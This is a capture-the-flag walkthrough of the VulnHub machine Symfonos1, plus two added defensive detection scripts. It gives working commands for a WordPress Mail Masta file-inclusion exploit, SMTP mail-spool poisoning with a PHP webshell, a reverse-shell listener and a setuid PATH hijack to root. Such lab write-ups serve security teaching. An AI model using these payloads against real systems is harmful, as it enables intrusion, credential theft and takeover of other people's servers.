VulnHub Symfonos1
29 May, 2021
Machine Link: https://www.vulnhub.com/entry/symfonos-1,322/
Beginning with an nmap scan:
$ sudo nmap -A -sC -sV -O -vvv -p 1-20000 192.168.56.119
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp syn-ack ttl 64 Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Issuer: commonName=symfonos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-06-29T00:29:42
| Not valid after: 2029-06-26T00:29:42
| MD5: 086e c75b c397 34d6 6293 70cd 6a76 c4f2
| SHA-1: e3dc 7293 d59b 3444 d39a 41ef 6fc7 2006 bde4 825f
|_ssl-date: TLS randomness does not represent time
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:66:1E:48 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.002 days (since Thu May 27 00:43:30 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 7h09m59s, deviation: 2h53m12s, median: 5h29m59s
| nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SYMFONOS<00> Flags: <unique><active>
| SYMFONOS<03> Flags: <unique><active>
| SYMFONOS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 49918/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52221/tcp): CLEAN (Couldn't connect)
| Check 3 (port 30912/udp): CLEAN (Failed to receive data)
| Check 4 (port 40103/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos
| NetBIOS computer name: SYMFONOS\x00
| Domain name: \x00
| FQDN: symfonos
|_ System time: 2021-05-27T05:16:03-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-27T10:16:03
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 1.08 ms 192.168.56.119
Nmap done: 1 IP address (1 host up) scanned in 16.48 seconds
Raw packets sent: 20023 (881.806KB) | Rcvd: 20015 (801.298KB)
The website was just a page with an image, so I moved on to enumerating the SMB ports:
===========================================
| Share Enumeration on 192.168.56.119 |
===========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
helios Disk Helios personal share
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
[+] Attempting to map shares on 192.168.56.119
//192.168.56.119/print$ Mapping: DENIED, Listing: N/A
//192.168.56.119/helios Mapping: DENIED, Listing: N/A
//192.168.56.119/anonymous Mapping: OK, Listing: OK
//192.168.56.119/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
S-1-5-21-3173842667-3005291855-38846888-1000 SYMFONOS\helios (Local User)
# smbclient --no-pass //192.168.56.119/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 28 21:14:49 2019
.. D 0 Fri Jun 28 21:12:15 2019
attention.txt N 154 Fri Jun 28 21:14:49 2019
19994224 blocks of size 1024. 17305668 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (16.7 KiloBytes/sec) (average 16.7 KiloBytes/sec)
# cat attention.txt
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus
With the first password I kept getting this error:
# smbclient //192.168.56.119/helios -U helios
Enter WORKGROUP\helios's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Using qwerty as the password I was able to log in:
# smbclient //192.168.56.119/helios -U SYMFONOS/helios
Enter SYMFONOS\helios's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 28 20:32:05 2019
.. D 0 Fri Jun 28 20:37:04 2019
research.txt A 432 Fri Jun 28 20:32:05 2019
todo.txt A 52 Fri Jun 28 20:32:05 2019
19994224 blocks of size 1024. 17305664 blocks available
# cat research.txt todo.txt
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
1. Binge watch Dexter
2. Dance
3. Work on /h3l105
http://192.168.56.119/h3l105/ was a WordPress site. The single visible post was by a user named admin.
wpscan found a plugin called "Mail Masta".
# wpscan --url http://192.168.56.119/h3l105/ --enumerate ap --plugins-detection aggressive
WordPress Security Scanner by the WPScan Team
Version 3.8.14
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.119/h3l105/ [192.168.56.119]
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.119/h3l105/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://192.168.56.119/h3l105/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.119/h3l105/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.119/h3l105/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.119/h3l105/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.119/h3l105/, Match: 'WordPress 5.2.2'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:06:19 (92219 / 92219) 100.00% Time: 00:06:19
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.119/h3l105/wp-content/plugins/akismet/
| Last Updated: 2021-03-02T18:10:00.000Z
| Readme: http://192.168.56.119/h3l105/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 4.1.9
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/akismet/readme.txt
[+] mail-masta
| Location: http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
| Readme: http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/, status: 200
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/readme.txt
[+] site-editor
| Location: http://192.168.56.119/h3l105/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
| Readme: http://192.168.56.119/h3l105/wp-content/plugins/site-editor/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/site-editor/, status: 200
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.119/h3l105/wp-content/plugins/site-editor/readme.txt
Mail Masta is vulnerable to local file inclusion as per this, and exploiting it was pretty straightforward:
# curl -s http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:111::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false
After searching around the internet, I came to know of a technique called Log File Poisoning. Essentially, if you can somehow get PHP written into a log file, you can then include that file through the LFI and pass a command as an additional query parameter. Since Apache hands the included file to the PHP interpreter, the injected PHP runs and executes the command.
At this point I couldn't find any indication of which log file could be poisoned. I realised it could be related to SMTP, since telnet can be used to send mail directly to the server, but the default mail log file /var/log/mail.log was not accessible. After going through existing writeups, I learned that each user's mail spool file, /var/mail/<user>, can be used instead.
# curl -s http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios
From root@symfonos.localdomain Fri Jun 28 21:08:55 2019
Return-Path: <root@symfonos.localdomain>
X-Original-To: root
Delivered-To: root@symfonos.localdomain
Received: by symfonos.localdomain (Postfix, from userid 0)
id 3DABA40B64; Fri, 28 Jun 2019 21:08:54 -0500 (CDT)
From: root@symfonos.localdomain (Cron Daemon)
To: root@symfonos.localdomain
Subject: Cron <root@symfonos> dhclient -nw
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
Message-Id: <20190629020855.3DABA40B64@symfonos.localdomain>
Date: Fri, 28 Jun 2019 21:08:54 -0500 (CDT)
/bin/sh: 1: dhclient: not found
From MAILER-DAEMON Thu May 27 05:08:51 2021
Return-Path: <>
X-Original-To: helios@symfonos.localdomain
Delivered-To: helios@symfonos.localdomain
Received: by symfonos.localdomain (Postfix)
id A4F1040B7B; Thu, 27 May 2021 05:08:50 -0500 (CDT)
Date: Thu, 27 May 2021 05:08:50 -0500 (CDT)
From: MAILER-DAEMON@symfonos.localdomain (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: helios@symfonos.localdomain
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="2EE7C40AB0.1622110130/symfonos.localdomain"
Content-Transfer-Encoding: 8bit
Message-Id: <20210527100850.A4F1040B7B@symfonos.localdomain>
This is a MIME-encapsulated message.
...
So I created a message and sent it through nc:
# nc 192.168.56.119 25
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO robot.org
250 symfonos.localdomain
MAIL FROM: robot@robots.org
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 8083140AB0
quit
221 2.0.0 Bye
# curl -s "http://192.168.56.119/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls%20-ltrha"
--2EE7C40AB0.1622110130/symfonos.localdomain--
From robot@robots.org Thu May 27 15:20:03 2021
Return-Path: <robot@robots.org>
X-Original-To: helios
Delivered-To: helios@symfonos.localdomain
Received: from robot.org (unknown [192.168.56.103])
by symfonos.localdomain (Postfix) with SMTP id 8083140AB0
for <helios>; Thu, 27 May 2021 15:19:12 -0500 (CDT)
total 120K
-rwxr-xr-x 1 helios helios 4.7K Jun 28 2019 test_mail.php
-rwxr-xr-x 1 helios helios 13K Jun 28 2019 demo-view-campaign.php
-rwxr-xr-x 1 helios helios 4.0K Jun 28 2019 view-campaign-list.php
-rwxr-xr-x 1 helios helios 12K Jun 28 2019 immediate_campaign.php
-rwxr-xr-x 1 helios helios 559 Jun 28 2019 ajaxreport.php
-rwxr-xr-x 1 helios helios 1.8K Jun 28 2019 post_campaign_send.php
-rwxr-xr-x 1 helios helios 22K Jun 28 2019 create-campaign.php
-rwxr-xr-x 1 helios helios 365 Jun 28 2019 campaign-delete.php
-rwxr-xr-x 1 helios helios 23K Jun 28 2019 view-campaign.php
-rwxr-xr-x 1 helios helios 8.0K Jun 28 2019 ajax_camp_send.php
drwxr-xr-x 2 helios helios 4.0K Jun 28 2019 .
-rwxr-xr-x 1 helios helios 294 Jun 28 2019 count_of_send.php
drwxr-xr-x 5 helios helios 4.0K Jun 28 2019 ..
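From the defender's side, the chain above leaves two traces: an access-log request whose `pl` value is a file path (plus a `cmd` parameter), and a PHP open tag sitting in a user's mail spool. The following detection script is an added example, not part of the original write-up; the log lines and spool contents are constructed to mirror the requests made above, and the regex assumes Apache's default combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache access-log lines modelled on the requests made in the
# write-up (timestamps and byte counts are made up, not captured from the box).
ACCESS_LOG = """\
192.168.56.103 - - [27/May/2021:05:16:03 -0500] "GET /h3l105/ HTTP/1.1" 200 5123
192.168.56.103 - - [27/May/2021:05:17:10 -0500] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1884
192.168.56.103 - - [27/May/2021:05:20:03 -0500] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls%20-ltrha HTTP/1.1" 200 2011
192.168.56.103 - - [27/May/2021:05:21:00 -0500] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1884
"""

# Constructed mail spool: a benign bounce followed by a message whose body is PHP.
MAIL_SPOOL = """\
From MAILER-DAEMON Thu May 27 05:08:51 2021
Subject: Undelivered Mail Returned to Sender

This is a MIME-encapsulated message.
From robot@robots.org Thu May 27 15:20:03 2021
Subject: hello

<?php system($_GET['cmd']); ?>
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
PHP_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)


def find_lfi_requests(log_text):
    """Flag requests whose query values look like file paths (absolute, or
    containing ../ after a second URL-decode) or that carry a 'cmd' parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        reasons = []
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            for raw in values:
                value = unquote(raw)  # parse_qs decoded once; this catches %252F-style double encoding
                if value.startswith("/") or "../" in value or "..\\" in value:
                    reasons.append(f"{name}=path:{value}")
                if name == "cmd":
                    reasons.append(f"cmd={value}")
        if reasons:
            hits.append({"ip": m["ip"], "script": url.path, "reasons": reasons})
    return hits


def find_php_in_spool(spool_text):
    """1-based line numbers of spool lines containing a PHP open tag. Mail
    delivered to a user should never contain one, so any hit is an indicator."""
    return [n for n, line in enumerate(spool_text.splitlines(), 1) if PHP_TAG.search(line)]


def poisoned_include_detected(log_text, spool_text, spool_path="/var/mail/helios"):
    """True when some request included the spool via the LFI *and* the spool
    holds PHP: both halves of the chain, correlated."""
    included = any(r.endswith("path:" + spool_path)
                   for h in find_lfi_requests(log_text) for r in h["reasons"])
    return included and bool(find_php_in_spool(spool_text))


if __name__ == "__main__":
    for hit in find_lfi_requests(ACCESS_LOG):
        print(hit["ip"], hit["script"], hit["reasons"])
    print("spool lines with PHP:", find_php_in_spool(MAIL_SPOOL))
    print("poisoning chain detected:", poisoned_include_detected(ACCESS_LOG, MAIL_SPOOL))
```

On a real host the same two checks are worth running over /var/log/apache2/access.log and every file under /var/mail; the bounce message shown earlier is exactly the kind of benign spool content the PHP-tag check must not trip on.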
Getting a reverse shell was fairly straightforward:
$ nc -vlnp 4242
listening on [any] 4242 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.119] 48310
/bin/sh: 0: can't access tty; job control turned off
$ ls
ajax_camp_send.php
ajaxreport.php
campaign-delete.php
count_of_send.php
create-campaign.php
demo-view-campaign.php
immediate_campaign.php
post_campaign_send.php
test_mail.php
view-campaign-list.php
view-campaign.php
$ id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
$ whoami
helios
I ran linpeas, and here is some interesting output from it:
[+] Searching Wordpress wp-config.php files
wp-config.php files found:
/var/www/html/h3l105/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'password123' );
define( 'DB_HOST', 'localhost' );
[+] SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x 1 root root 8.5K Jun 28 2019 /opt/statuscheck
--- It looks like /opt/statuscheck is executing curl and you can impersonate it (strings line: curl -I H)
From the wordpress.wp_users table I was able to get the admin's hashed password:
MariaDB [wordpress]> SELECT * FROM wp_users;
SELECT * FROM wp_users;
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$B8GkoAZZA6.9fooDdaL05B0sazTW0P/ | admin | helios@blah.com | | 2019-06-29 00:46:01 | | 0 | admin |
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)
I had no luck cracking this hash, so I moved on to checking statuscheck. As indicated previously, it is a SUID binary that calls curl by bare name instead of by its full path, so whichever curl $PATH resolves first is the one it runs.
helios@symfonos:/opt$ file statuscheck
file statuscheck
statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
helios@symfonos:/opt$ ls -ltrha
ls -ltrha
total 20K
drwxr-xr-x 22 root root 4.0K Jun 28 2019 ..
-rwsr-xr-x 1 root root 8.5K Jun 28 2019 statuscheck
drwxr-xr-x 2 root root 4.0K Jun 28 2019 .
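The linpeas line above is a heuristic you can reproduce yourself: look at every setuid binary's printable strings and flag command lines whose first word is a program name with no directory in front of it. This audit script is an added example, not linpeas or anything from the write-up; the sample byte string is a constructed stand-in for a binary like /opt/statuscheck, and the directory roots it walks by default are an assumption.

```python
import os
import re
import stat

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")  # what `strings -n 4` extracts

# Constructed stand-in for a setuid ELF: one command by bare name (resolved
# through $PATH at run time), one by absolute path, plus ordinary noise.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
                 + b"curl -I http://localhost\x00"
                 + b"/usr/bin/id\x00"
                 + b"sh -c id\x00"
                 + b"GCC: (Debian 6.3.0-18) 6.3.0\x00")
SAMPLE_KNOWN = {"curl", "id", "sh", "bash"}


def printable_strings(data):
    """Runs of printable ASCII, the same view of a binary that strings(1) gives."""
    return [s.decode("ascii") for s in PRINTABLE.findall(data)]


def path_resolved_commands(data, known_commands):
    """Embedded strings whose first word is a program name written without a
    directory: system(3), popen(3) and execvp(3) all resolve such a name via
    $PATH, which is exactly what lets a setuid caller be hijacked."""
    hits = []
    for s in printable_strings(data):
        words = s.split()
        if words and "/" not in words[0] and words[0] in known_commands:
            hits.append(s)
    return hits


def commands_on_path(path_env=None):
    """Names of executables reachable through $PATH (what a bare name can resolve to)."""
    names = set()
    dirs = (path_env if path_env is not None else os.environ.get("PATH", "")).split(os.pathsep)
    for d in dirs:
        try:
            names.update(n for n in os.listdir(d) if os.access(os.path.join(d, n), os.X_OK))
        except OSError:
            continue
    return names


def find_setuid_binaries(roots):
    """Regular files under the given roots with the setuid or setgid bit set."""
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for f in files:
                p = os.path.join(dirpath, f)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    yield p


def audit(roots=("/usr/bin", "/usr/sbin", "/opt"), known_commands=None):
    """Map each setuid/setgid binary under roots to the bare-name commands it embeds."""
    known = commands_on_path() if known_commands is None else known_commands
    findings = {}
    for p in find_setuid_binaries(roots):
        try:
            with open(p, "rb") as fh:
                hits = path_resolved_commands(fh.read(), known)
        except OSError:
            continue
        if hits:
            findings[p] = hits
    return findings


if __name__ == "__main__":
    print("sample:", path_resolved_commands(SAMPLE_BINARY, SAMPLE_KNOWN))
    for path, cmds in audit().items():
        print(path, cmds)
```

The fix on the binary's side is to invoke the helper by absolute path with a fixed environment (execve with an explicit PATH rather than system(3) under the caller's environment), which is what makes the result of this audit empty.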
So I created an executable called curl that launches bash, put /tmp first in $PATH, and ran statuscheck:
helios@symfonos:/tmp$ echo "/bin/bash -p" > curl
echo "/bin/bash -p" > curl
helios@symfonos:/tmp$ chmod +x curl
chmod +x curl
helios@symfonos:/tmp$ PATH=/tmp:$PATH /opt/statuscheck
PATH=/tmp:$PATH /opt/statuscheck
bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
proof.txt
bash-4.4# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:1!
Contact me via Twitter @zayotic to give feedback!